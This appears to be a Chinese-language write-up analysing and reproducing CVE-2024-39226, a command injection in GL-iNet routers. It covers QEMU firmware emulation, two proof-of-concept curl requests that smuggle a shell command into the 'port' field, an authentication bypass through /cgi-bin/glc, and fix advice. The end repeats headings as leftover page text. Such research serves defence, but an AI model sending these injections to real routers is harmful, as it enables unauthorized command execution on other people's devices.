GL-iNet路由器CVE-2024-39226漏洞分析与复现指南<\/h1>

1. 漏洞概述<\/h2>
CVE-2024-39226是影响多款GL-iNet路由器的命令注入漏洞，存在于s2s模块的enable_echo_server功能中。攻击者可通过构造恶意请求在路由器上执行任意命令。<\/p>

2. 受影响产品<\/h2>

基于OpenWrt操作系统的GL-iNet路由器<\/li>

确认受影响的固件版本：GL-AX1800 Flint 4.5.16<\/li> <\/ul>

3. 环境搭建<\/h2>

3.1 固件提取<\/h3>

从GL-iNet官网下载受影响固件<\/li>

使用binwalk提取Squashfs文件系统：

binwalk -Me root
<\/code><\/pre>
<\/li>
确认架构为32位ARM：
file squashfs-root\/bin\/busybox
<\/code><\/pre>
<\/li>
<\/ol>
3.2 QEMU模拟<\/h3>


准备ARM架构模拟环境：<\/p>

vmlinuz-3.2.0-4-vexpress（内核镜像）<\/li>
initrd.img-3.2.0-4-vexpress（RAM磁盘映像）<\/li>
debian_wheezy_armhf_standard.qcow2（虚拟磁盘）<\/li>
<\/ul>
<\/li>

启动QEMU：<\/p>
sudo qemu-system-arm -M vexpress-a9 -cpu cortex-a15 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=\/dev\/mmcblk0p2" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic
<\/code><\/pre>
<\/li>

配置网络：<\/p>

宿主机运行net.sh脚本创建tap0接口<\/li>
QEMU虚拟机配置IP和路由：
ifconfig eth0 192.168.100.2 netmask 255.255.255.0
route add default gw 192.168.100.254
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>

上传固件并chroot：<\/p>
scp -r squashfs-root\/ root@192.168.100.2:\/root
mount -t proc \/proc .\/squashfs-root\/proc
mount -o bind \/dev .\/squashfs-root\/dev
chroot .\/squashfs-root\/ sh
<\/code><\/pre>
<\/li>
<\/ol>
4. 服务启动<\/h2>
4.1 启动Nginx<\/h3>


首次尝试启动：<\/p>
\/etc\/init.d\/nginx start
<\/code><\/pre>

可能报错缺少目录，需手动创建<\/li>
<\/ul>
<\/li>

修复404问题：<\/p>
\/etc\/uci-defaults\/80_nginx-oui
<\/code><\/pre>
<\/li>
<\/ol>
4.2 启动依赖服务<\/h3>


启动ubus-proxy：<\/p>
\/sbin\/ubusd
<\/code><\/pre>
<\/li>

启动fcgiwrap：<\/p>
\/etc\/init.d\/fcgiwrap start
<\/code><\/pre>
<\/li>
<\/ol>
5. 漏洞复现<\/h2>
5.1 本地利用PoC<\/h3>
curl -H 'glinet: 1' 127.0.0.1\/rpc -d '{"method":"call", "params":["", "s2s", "enable_echo_server", {"port": "7 $(touch \/root\/test)"}]}'
<\/code><\/pre>
5.2 远程利用PoC<\/h3>
curl http:\/\/192.168.100.2\/cgi-bin\/glc -d '{"object":"s2s","method":"enable_echo_server","args":{"port":"7 $(touch \/root\/test2024)"}}'
<\/code><\/pre>
6. 漏洞分析<\/h2>
6.1 漏洞位置<\/h3>

文件：\/usr\/lib\/oui-httpd\/rpc\/s2s.so<\/li>
函数：enable_echo_server<\/li>
<\/ul>
6.2 漏洞成因<\/h3>

代码检查port参数是否为有效数字（正数且<65535）<\/li>
但未严格限制内容，允许嵌入特殊字符如$()<\/li>
通过snprintf构造命令字符串：
snprintf(v27, 128, "%s -p %s -f", "\/usr\/bin\/echo_server", v9);
<\/code><\/pre>
<\/li>
最终通过system()执行：
system(v27);
<\/code><\/pre>
<\/li>
<\/ol>
6.3 调用链分析<\/h3>


请求路径：<\/p>

\/rpc → \/usr\/share\/gl-ngx\/oui-rpc.lua<\/li>
\/cgi-bin\/glc → \/www\/cgi-bin\/glc<\/li>
<\/ul>
<\/li>

权限校验：<\/p>

\/usr\/lib\/lua\/oui\/rpc.lua中的access函数<\/li>
检查is_local和glinet标头<\/li>
<\/ul>
<\/li>

绕过方法：<\/p>

直接请求\/cgi-bin\/glc可跳过权限校验<\/li>
<\/ul>
<\/li>
<\/ol>
7. 修复建议<\/h2>

对port参数进行严格过滤，禁止任何非数字字符<\/li>
避免使用system()执行命令，改用execve等安全函数<\/li>
加强权限校验，确保所有路径都经过适当验证<\/li>
<\/ol>
8. 关键文件列表<\/h2>


配置文件：<\/p>

\/etc\/nginx\/conf.d\/gl.conf<\/li>
\/etc\/nginx\/nginx.conf<\/li>
<\/ul>
<\/li>

处理脚本：<\/p>

\/usr\/share\/gl-ngx\/oui-rpc.lua<\/li>
\/usr\/lib\/lua\/oui\/rpc.lua<\/li>
\/www\/cgi-bin\/glc<\/li>
<\/ul>
<\/li>

漏洞模块：<\/p>

\/usr\/lib\/oui-httpd\/rpc\/s2s.so<\/li>
<\/ul>
<\/li>
<\/ol>
9. 调试技巧<\/h2>


查看Nginx日志：<\/p>

修改\/etc\/nginx\/nginx.conf增加日志级别<\/li>
日志路径通常为\/var\/log\/nginx\/<\/li>
<\/ul>
<\/li>

服务状态检查：<\/p>

确认ubusd和fcgiwrap进程是否运行<\/li>
检查端口监听情况<\/li>
<\/ul>
<\/li>

错误排查：<\/p>

确保所有必需目录存在<\/li>
检查文件权限是否正确<\/li>
<\/ul>
<\/li>
<\/ol>

GL-iNet路由器CVE-2024-39226漏洞分析与复现指南<\/h1>

1. 漏洞概述<\/h2> CVE-2024-39226是影响多款GL-iNet路由器的命令注入漏洞，存在于s2s模块的enable_echo_server功能中。攻击者可通过构造恶意请求在路由器上执行任意命令。<\/p>

3. 环境搭建<\/h2>

4. 服务启动<\/h2>

5. 漏洞复现<\/h2>

6. 漏洞分析<\/h2>

1. 漏洞概述<\/h2>
CVE-2024-39226是影响多款GL-iNet路由器的命令注入漏洞，存在于s2s模块的enable_echo_server功能中。攻击者可通过构造恶意请求在路由器上执行任意命令。<\/p>